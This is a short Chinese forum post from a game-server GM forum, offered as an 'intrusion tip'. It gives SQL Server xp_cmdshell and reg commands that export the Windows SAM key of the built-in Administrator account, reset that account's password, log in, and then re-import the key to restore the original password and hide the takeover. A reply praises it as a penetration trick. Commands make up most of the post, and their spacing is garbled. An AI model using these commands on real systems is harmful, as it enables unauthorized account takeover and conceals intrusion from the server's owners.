传奇GM论坛»论坛 › 精品版本 › 微端版本 › 入侵技巧：导出管理员密码文件

入侵技巧：导出管理员密码文件

192 |

0 | 2012-4-1 19:22:00 | 显示全部楼层 |阅读模式

sa默认应该可以读sam键。

regexportHKLM\SAM\SAM\Domains\Account\Users\000001F4c:\old.reg

netuseradministratortest

用administrator登陆.

用完机器后

regimportc:\old.reg

根本不用克隆.

找到对应的sid.

/*不狐：这则经验非常不错，前面我做过一次渗透就没想到可以这样来！*/

默认情况下sa继承system权限，对sam键值有完全控制权限。

SQL代码

execmaster..xp_cmdshell"regexportHKLM\SAM\SAM\Domains\Account\Users\000001F4c:\old.reg"--

或者

execmaster..xp_cmdshell"regedit-eC:\1.regHKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4"--

都是可行的。
 
*
*

发帖前要善用【论坛搜索】功能，那里可能会有你要找的答案或者已经有人发布过相同内容了，请勿重复发帖。

使用道具举报